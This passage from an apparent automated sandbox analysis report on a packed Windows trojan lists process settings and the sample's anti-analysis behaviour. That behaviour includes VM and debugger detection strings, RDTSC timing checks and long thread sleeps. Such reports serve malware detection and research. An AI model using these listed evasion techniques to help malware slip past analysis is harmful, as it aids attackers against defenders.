          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE
          Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE@+K
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE10747
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE11798
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE8116
          Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE10112
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000001498E4 second address: 00000000001498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000149B5E second address: 0000000000149B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B8D0A50000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B8D0BA0000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B8D0CA0000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B8D1110000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B8D1850000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B8D1CC0000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B8D1DC0000 memory commit | memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1D32C600000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1D32C720000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1D32C820000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1D32CBD0000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1D32CF00000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1D32D800000 memory reserve | memory write watch
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1D32D550000 memory commit | memory reserve | memory write watch
          Source: C:\Windows\explorer.exeFile opened / queried: scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 5832Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 6856Thread sleep count: 47 > 30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 6856Thread sleep count: 120 > 30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 6376Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 4820Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 2088Thread sleep time: -85000s >= -30000s
          Source: explorer.exe, 00000010.00000003.900881622.000000000F25D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B1
          Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmpBinary or memory string: vmware horizon clientator xmplayerrizon c
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000010.00000002.1026871359.0000000000DEE000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000010.00000002.1046519388.000000000621D000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: tpautoconnsvc#Microsoft Hyper-V
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: cmd.txtQEMUqemu
          Source: explorer.exe, 00000002.00000000.703940604.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmpBinary or memory string: 7585*|voice & video calls*|skype1*|voice recorder*|vioce6945*|vmware player*|vmplayer4486*|voice recorder*|voive7212*|voice recorder*|recr7315*|trader workstation*|tws1*|vuze*|azu5812*|weather*|local weather6239*|virusscan console*|mc581*|tools command prompt*|cmd1*|visiontools pro-e*|vt431*|twitter*|twiter5581*|weather*|the weather6785*|visual studio 2013*|v
          Source: explorer.exe, 00000010.00000003.907549674.000000000F48E000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9t
          Source: explorer.exe, 00000010.00000003.887959259.00000000063B1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: vmsrvc
          Source: explorer.exe, 00000002.00000000.695416216.0000000004755000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.704041361.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000010.00000003.902544793.00000000063F7000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B@c
          Source: explorer.exe, 00000002.00000000.704088912.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe11333
          Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
          Source: explorer.exe, 00000010.00000003.902602832.000000000F48D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BW
          Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmpBinary or memory string: *|vmware player*|vmplayer4486
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000010.00000003.831423585.00000000062FE000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000010.00000002.1047169993.000000000637F000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000010.00000002.1046519388.000000000621D000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: vmusrvc
          Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}@
          Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmpBinary or memory string: virusscan consolemberswill it rain todaytr consolevmware workstation 12 playerhrewcess manag
          Source: SearchUI.exe, 00000016.00000002.893292909.000001B0CAFC5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@b;
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: vmtools
          Source: explorer.exe, 00000010.00000003.908089865.000000000EEB2000.00000004.00000001.sdmpBinary or memory string: }#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZZ[
          Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
